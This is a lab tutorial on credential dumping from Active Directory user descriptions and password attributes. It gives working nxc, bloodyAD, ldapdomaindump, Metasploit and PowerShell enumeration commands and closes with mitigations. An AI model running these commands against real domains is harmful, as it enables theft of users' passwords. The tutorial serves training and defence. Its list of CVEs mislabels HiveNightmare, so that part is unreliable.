Credential Dumping

Credential Dumping: AD User Comment

In this article, we explore how attackers exploit AD user comments and attributes for password enumeration. This process helps attackers escalate their access within an organization by leveraging AD user comment password enumeration.

Active Directory (AD) and related services contain several critical vulnerabilities. These can expose password-related information stored in attributes like UserPassword, UnixUserPassword, unicodePwd, and msSFU30Password. Attackers can exploit these flaws to access password hashes or even cleartext passwords. This significantly increases the risk of unauthorized access to systems and data. Key attack paths include privilege escalation, improper access control configurations and vulnerabilities in network protocols like SMB or RDP that enable attackers to intercept or access sensitive fields. Notable CVEs that enable such exploits include CVE-2020-1472 (Zerologon), CVE-2017-0144 (EternalBlue), CVE-2021-33766 (HiveNightmare), and CVE-2019-0708 (BlueKeep), all of which if exploited, can lead to unauthorized access to critical password fields in AD.

Table of Contents

Understanding of Active Directory (AD) password attributes

Prerequisites

Lab Setup

Exploitation

  • nxc
  • bloodyAD
  • ldapdomaindump
  • MetaSploit
  • Get-WmiObject

Mitigation

Understanding of Active Directory (AD) password attributes:

UserPassword: In Active Directory, the UserPassword field typically refers to the password hash stored for users (NTLM or sometimes Kerberos hashes). These hashes are used to authenticate users without directly storing plaintext passwords. If attackers access these hashes, they can perform offline attacks. These include brute force or dictionary attacks to recover original passwords.

UnixUserPassword: This field is used when integrating AD with Unix/Linux systems. Services like SSSD or nsswitch.conf support such authentication. It stores the password hash for Unix-based systems, which is usually a different format (e.g., DES, SHA-512) than Windows hashes.

unicodePwd: The unicodePwd attribute in Active Directory holds the password for a user in Unicode format (UTF-16). This field is used by AD when passwords are being set or updated. In a typical AD deployment, this field would not be readable directly through normal LDAP queries due to security restrictions.

msSFU30Password: The msSFU30Password attribute is associated with the Microsoft Services for Unix (SFU) integration. This field stores passwords used in Unix environments but integrated into Active Directory, similar to the unixUserPassword attribute. If a system uses SFU, this field will store the password hash in a Unix-compatible format.

Prerequisites

  • Windows Server 2019 as Active Directory Domain Controller
  • Tools: nxc, bloodyAD, ldapdomaindump, MetaSploit, Get-WmiObject utility
  • Kali Linux
  • Windows 10/11 – As Client/Attaker Machine

Lab Setup

In this lab set up, we will create an AD user, then add user description that contains user’s password and provide passwords in “userPassword” & “userUnixPassword” attributes.

Create the AD Environment

To simulate an Active Directory environment, set up a Windows Server 2019 as a Domain Controller (DC). You will also need a client/attacker machine (Windows or Linux) to run enumeration and exploitation tools.

Domain Controller

Install Windows Server (2016 or 2019 recommended).

  • Promote it to a Domain Controller by adding the “Active Directory Domain Services” role.
  • Set up the domain (e.g., “local”).
  • Next, create a domain user with username “raj” and password “Password@1”.

Create an AD user and provide user description

Once the AD environment is set up, open PowerShell in Administrative mode on the Windows Server. Then, run the two commands below. These commands will create the user “divya” with the “description” attribute containing the password.

Import-module ActiveDirectory
Set-ADUser –Identity “divya” –Description “this is a default password =Password@123”

Using “Get-ADUser” utility and a command like below, we can confirm that a user with “divya” as username has been created along with the description provided.

Get-ADUser -Identity "divya" -Properties Description | Select-Object Name, Description

Then navigate to “divya” user’s properties window by following the below steps.

Steps
  • Open “Active Directory Users and Computers (ADUC)” on the Domain Controller.
  • Enable the “Advanced Features” view by clicking on “View > Advanced Features”.
  • Locate user “divya” in the “Users” container.
  • Right-click on “divya user and go to “Properties”.

This action opens “General” tab of “divya” user’s Properties window, wherein the “Description” added can be viewed/confirmed.

Update userPassword attribute:

Navigate to “Attribute Editor” tab within “divya” user’s properties window, select userPassword” attribute and click on “Edit” button. This action opens “Multi-valued Octet String Editor” pop-up window. Click on “Add” button in the new window opened.

Then, provide “divya” user’s password Password@123 in it’s Hexadecimal form within “Value” textarea and click on “OK” button in the “Octet String Attribute Editor” pop-up window.

Update userUnixPassword attribute:

Similar to the steps mentioned above in “Update userPassword attribute” section, one can select “userUnixPassword” attribute and update it’s value to “admin@123”.

Select userUnixPassword” attribute and click on “Edit” button. This action opens “Multi-valued Octet String Editor” pop-up window. Click on “Add” button in the new window opened.

Provide “divya” user’s Unix Password admin@123 in it’s Hexadecimal form within “Value” textarea and click on “OK” button in the “Octet String Attribute Editor” pop-up window.

Alternatively, one can run below command from the PowerShell window that’s opened in “Create an AD user and provide user description” section to update “divya” user’s Unix Password as “admin@123”.

Set-ADUser -Identity "divya" -Replace @{
 uidNumber=1001;
    gidNumber=1001;
    unixHomeDirectory="/home/linux";
    loginShell="/bin/bash";
    unixUserPassword="admin@123"
}

Exploitation

nxc

Run the below command from Kali Linux Root Terminal to Get user descriptions stored in Active Directory using “user-desc” module of “nxc” tool.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M user-desc

Next, access “nxc” tool logs using the below command to revisit the enumerated information at a later time.

cat /root/.nxc/logs/UserDesc-192.168.1.48-20250120_052352.log

In addition, run the following commands to enumerate sensitive information such as passwords.

  • Enumerate AD users’ descriptions, using the module “get-desc-users”, which at times may contain passwords.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-desc-users

  • Enumerate userPassword attribute, using the module “get-userPassword”, from all users in ldap.

nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-userPassword

  • Enumerate unixUserPassword attribute, using the module “get-unixUserPassword”, from all users in ldap.
nxc ldap ignite.local -u raj -p Password@1 -M get-unixUserPassword

bloodyAD

Run the below command to enumerate all users’ sensitive information that is stored in “userPassword”, “unixUserPassword”, “unicodePassword” and “description” objectClasses.

bloodyAD -u raj -p 'Password@1' -d ignite.local --host 192.168.1.48 get search --filter '(|(userPassword=*)(unixUserPassword=*)(unicodePassword=*)(description=*))' --attr userPassword,unixUserPassword,unicodePwd,description

Furthermore, you can observe output containing sensitive information like passwords and attacks a user is vulnerable to.

ldapdomaindump

Run below commands to enumerate complete information about the AD under testing, then navigate to “AD_DUMP” directory and list all the files generated upon running “ldapdomaindump” tool.

ldapdomaindump -u 'ignite.local\raj' -p Password@1 192.168.1.48 -o AD_DUMP
cd AD_DUMP
ls -al

Now, access “domain_users.html” file using a browser. Observe that the attacker could enumerate AD users’ “description” attribute that gives away user’s password or the attack technique to which the user is vulnerable to.

MetaSploit

Run MetaSploit Framework Console from Kali Linux Root Terminal using the below command.

Use “ldap_query” auxiliary module, set all required options and run the module to enumerate all AD users’ information.

use auxiliary/gather/ldap_query
set action ENUM_ACCOUNTS
set rhosts 192.168.1.48
set username raj
set password Password@1
set domain ignite.local
run

Below output screenshot lists AD users’ information along with their corresponding information stored in AD “description” attribute.

Note: Alternatively, we may use “enum_ad_user_comments” module and enumerate user’s information along with the information stored in AD “descsription” attribute. Below is the list of commands to execute in sequence and the output screenshot upon running listed commands from Kali Linux Root Terminal.

use post/windows/gather/enum_ad_user_comments
set session 1
run

Get-WmiObject

Open PowerShell in Administrative Mode in a Windows Client/Attacker Machine. Then, run the below command to enumerate information like “username”, “SID” and “description” of users’ listed in the command using the “Get-WmiObject” utility.

Get-WmiObject -Class Win32_UserAccount | Where-Object { $_.Name -in @("raj", "divya") } | Select-Object Name, SID, Domain, Description

Mitigation

Vulnerabilities like CVE-2020-1472 (Zerologon), CVE-2017-0144 (EternalBlue), CVE-2021-33766 (HiveNightmare), and CVE-2019-0708 (BlueKeep) highlight potential risks. However, the UserPassword, UnixUserPassword, unicodePwd, and msSFU30Password attributes may not always present a direct threat. These attributes are vulnerable under specific conditions

However, attackers can use various attack vectors to gain the necessary access to retrieve these password-related fields from Active Directory configuration.

Below are the best practices to follow diligently to remediate and resolve the possibility of enumerating AD users’ passwords:

Use Strong Encryption: Ensure that all communications between clients and domain controllers remain encrypted (LDAPS, SMB encryption, etc.) to prevent attackers from intercepting password hashes. Also, disable legacy authentication protocols such as NTLM where possible.

Limit Access to Password Attributes: Use stringent Access Control Lists (ACLs) to restrict access to sensitive attributes like UserPassword, UnixUserPassword, unicodePwd, and msSFU30Password to only trusted & limited number of administrators.

Regularly Audit AD Permissions: Regularly review and audit the permissions on AD objects to ensure that only authorized users and groups can access sensitive fields.

Apply Security Patches: Ensure all AD and associated systems (like Unix integrations) are regularly patched to prevent exploitation of known vulnerabilities.

Monitor for Privilege Escalation: Use monitoring & alerting tools and practices to detect suspicious activities such as privilege escalation, lateral movement and/or attempts to dump credentials.

Author: Srikrishna is a Cybersecurity leader driving security excellence and mentoring teams to enhance security across products, networks, and organizations.. ContacHere